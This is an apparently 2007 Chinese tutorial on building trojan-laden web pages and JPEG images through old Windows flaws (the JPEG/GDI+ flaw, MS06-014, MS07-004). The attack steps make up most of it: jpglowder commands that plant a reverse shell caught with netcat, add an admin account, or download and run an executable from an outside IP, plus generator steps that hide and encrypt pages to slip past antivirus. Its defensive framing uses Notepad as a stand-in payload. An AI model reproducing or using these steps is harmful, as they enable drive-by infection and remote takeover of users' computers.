網(wǎng)絡(luò)上到處都可以下載到各種木馬，任何人都可以對其進行包裝和捆綁，所以軟件木馬的變種和發(fā)展非?？?，防范起來也比較麻煩，要想“百毒不侵”，就必須知己知彼。下面我們就來詳細分析一下木馬的主要偽裝形式、誘騙運行手段和藏身之處。

為保障大家電腦安全，我們以Windows的記事本程序替代木馬主程序。重點分析木馬入侵的方式。同時建議大家最好在虛擬機上做這些實驗(這里假設(shè)虛擬機的IP是192.168.1.2，主機的IP是192.168.1.1)。

什么是網(wǎng)頁木馬

網(wǎng)頁木馬是利用網(wǎng)頁作為傳播手段的，早期的網(wǎng)頁木馬均是使用SCRIPT語言編寫的一些惡意代碼，利用IE的漏洞來實現(xiàn)木馬的植入。當用戶登錄某些含有網(wǎng)頁木馬的網(wǎng)站時，有的是直接執(zhí)行頁面內(nèi)的shellcode，有的是悄悄下載木馬程序并自動運行。這種網(wǎng)頁病毒容易編寫和修改，每次出現(xiàn)新的IE漏洞，都有大面積的網(wǎng)站被掛馬，即使是許多著名的門戶網(wǎng)站也不能幸免。

這種非法惡意程序能夠得以自動執(zhí)行，在于它完全不受用戶的控制。一旦瀏覽含有該病毒的網(wǎng)頁，即可以在不知不覺的情況下馬上中招，給用戶的系統(tǒng)帶來不同程度的破壞。令你苦不堪言，甚至損失慘重無法彌補。

既然是網(wǎng)頁木馬，那么很簡單的說，它就是一個網(wǎng)頁，但在這個網(wǎng)頁運行于本地時，它所執(zhí)行的操作就不僅僅是下載后再讀出，伴隨著前者的操作背后，就是木馬的下載，然后執(zhí)行，悄悄地修改你的注冊表，等等。那么，這類網(wǎng)頁都有什么特征呢?

1)美麗的網(wǎng)頁名稱。

2)通過電子郵件發(fā)送該木馬網(wǎng)頁的網(wǎng)址。

3)在論壇上參與熱門的話題，并提供給其它人木馬網(wǎng)頁的網(wǎng)址。

4)使用QQ聊天將這個網(wǎng)址發(fā)送給對方。

5)加入到流媒體文件中。

下面是一些曾經(jīng)風光一時的網(wǎng)頁木馬，雖然到筆者發(fā)稿之日，Microsoft已經(jīng)發(fā)布了所有的相關(guān)補丁，但即使是這樣，它們在目前相當多的計算機上依然有效。特別是對那些經(jīng)常重裝計算機的用戶和采用系統(tǒng)還原功能的網(wǎng)吧和學校網(wǎng)絡(luò)機房，這些木馬依然具有很強的破壞性。

實驗程序：圖片木馬制作工具Ipglowder

測試地址：http://218.86.126.77/cpcfan/2007/3/mm.exe(偽木馬程序)

補丁發(fā)布時間：2004年9月

補丁下載地址：

http://www.microsoft.com/athome/security/update/bulletins/200409_jpeg_t001.mspx

Windows的JPEG圖像漏洞可以導致系統(tǒng)被入侵和遠程執(zhí)行惡意代碼。入侵者可以將后門代碼插入到圖片中間接運行，該漏洞主要涉及操作系統(tǒng)中一個名為GdiPlus.d11的文件。由于眾多軟件都調(diào)用了這個動態(tài)鏈接庫處理IPEG圖片，使得該漏洞的涉及面非常廣，如Windows XP SP1、MS Office、QQ2004等等。所以可以將后門通過這個漏洞原理來插入到圖片中，這樣存在此漏洞的程序會無條件運行圖片中的后門程序，從而控制受影響的系統(tǒng)。

這里介紹的是jpglowder的使用，jpglowder的參數(shù)主要有：

參數(shù)1：-r your_ip or-b，這里使用-r和-b選項之后，就可以將端口反彈的功能加入到即將生成的圖片后門中。

參數(shù)2：-a or-d，使用-a選項之后，生成一個可以自動添加管理員賬號的圖片后門，添加的管理員賬號和密碼均為X。使用-d選項之后，將生成一個能下載指定木馬地址并運行的圖片后門，參數(shù)用法是：-d木馬的URL地址。

參數(shù)3：-p(optional)，這個選項運行你修改默認的連接端口。

制作生成后門的圖片：

1)在本機輸入命令：jpglowder-r 192.168.1.1-P 8888lxl.jpg，生成一個后門具有開放8888端口的功能的jPg圖片。

2)在虛擬機打開圖片lxl.jpg。

3)在本機輸入連接命令：nc.exe-l-p 8888，這樣虛擬機會自動連接本機，從而得到權(quán)限。

制作可下載木馬的圖片：

1)在本機輸入命令：jpglowder -a-dhttp://218.86.126.77/cpcfan/2007/3/mm.exe lx2.jpg2)在虛擬機打開圖片lx2.jPg，如正常的話會下載并運行木馬mm.exe，由于服務(wù)器上的偽木馬程序是一個記事本文檔，所以運行后的現(xiàn)象是打開記事本。

實驗二：Ms06-014木馬制作

實驗程序：MS06-014網(wǎng)頁木馬生成器

測試地址：http://218.86.126.77/cPcfan/2007/3/mm.exe(偽木馬程序)

補丁發(fā)布時間：2006年4月

補丁下載地址：http://WWW.microsoft.com/china/technet/security/bulletin/ms06-014.mspx

Ms06-014漏洞是今年的掛馬王，采用Ms06-014漏洞木馬生成器非常的多，被掛上Ms06-014木馬的著名網(wǎng)站數(shù)不勝數(shù)，制作Ms06-014木馬的步驟非常簡單：

1)下載一個MS06-014網(wǎng)頁木馬生成器。

2)運行“MS06-014木馬生成器”，在“木馬地址”中填入已經(jīng)上傳到空間中的木馬網(wǎng)址http://218.86.126.77/cpcfan/2007/3/mm.exe，并勾選下方的“是否隱藏源碼”選項。這個選項的作用是當網(wǎng)頁木馬運行后，會自動清空網(wǎng)頁源文件，用戶即使起了疑心也無法找到痕跡。當然清空的是用戶打開的源文件，而網(wǎng)頁木馬卻不受影響。點擊“生成網(wǎng)馬”按鈕即可在程序的同目錄生成一個名為muma.htm的網(wǎng)頁木馬。

3)加密木馬程序還不夠，還需對網(wǎng)頁木馬進行加密?！癕S06-014木馬生成器”的“加密方式”中提供了四種網(wǎng)頁的加密方式，分別是：空字符加密、轉(zhuǎn)義字符加密、Escape加密和拆分特征碼。這里我們選中“轉(zhuǎn)義字符加密”選項后點擊“加密”按鈕，免殺的網(wǎng)頁木馬就生成了。將該加密過的網(wǎng)頁木馬上傳到網(wǎng)頁空間中即可。

實驗三：Ms07004網(wǎng)馬制作

實驗程序：Ms07004網(wǎng)馬生成器

補丁發(fā)布時間：2007年1月

補丁下載地址：http://WWW.microsoft.com/china/technet/security/bulletin/MS07-004.mspx

Microsoft Windows中的矢量標記語言(VML)實施中存在一個遠程執(zhí)行代碼漏洞。攻擊者可能通過構(gòu)建特制的網(wǎng)頁或HTML電子郵件利用該漏洞，當用戶訪問網(wǎng)頁或查看郵件時，該漏洞可能允許遠程執(zhí)行代碼。成功利用此漏洞的攻擊者可以完全控制受影響的系統(tǒng)。MS07004和上一個漏洞Ms06-014經(jīng)常做在一起對計算機用戶的威脅非常巨大。

木馬的生成步驟如下：

1)下載Ms07004網(wǎng)馬生成器。

2)運行“Ms07004網(wǎng)馬生成器”，輸入木馬程序存放的地址，如：http://218.86.126.77/cpcfan/2007/3/mm.exe

3)Ms07004網(wǎng)馬生成器生成一個文件zy.htm。

4)把這個文件zy.htm傳到服務(wù)器上訪問或直接運行，計算機就會自動下載mm.exe并運行。

限于篇幅，今天關(guān)于網(wǎng)頁木馬的制作就講到這里，在下期的文章中，我們會帶給大家兩個關(guān)于圖標文件視頻的木馬。另外，還會解決大家的一個疑問：這些木馬究竟是如何“秘密潛入”各大網(wǎng)站的呢?’